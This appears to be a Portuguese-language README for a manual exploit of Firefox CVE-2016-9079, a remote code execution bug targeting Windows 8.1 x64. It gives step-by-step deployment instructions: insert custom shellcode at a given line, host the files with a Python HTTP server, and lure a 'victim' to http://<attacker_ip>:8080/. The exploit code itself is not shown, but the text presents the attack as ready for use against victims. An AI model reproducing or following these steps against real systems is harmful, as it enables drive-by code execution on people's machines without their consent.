
Exploit manual para o Firefox CVE-2016-9079 RCE visando Windows 8.1 x64 via nsSMILTimeContainer, com injeção de shellcode personalizável através de um servidor HTTP local.
Este é um exploit manual de https://www.exploit-db.com/exploits/41151, outro existe para Windows 10 (https://github.com/soham23/firefox-rce-nssmil) mas não funcionou no Windows 8.1, então fiz o meu.
Você precisa modificar a linha 241 com seu próprio shellcode. Há um exemplo acima desta linha.
Baixe o repositório e inicie um servidor. Usar um servidor Python funciona bem.
python3 -m http.server 8080
Na sua vítima, navegue até http://<attacker_ip>:8080/ e deve funcionar.
Testado no Windows 8.1 Enterprise x64 usando Firefox 38.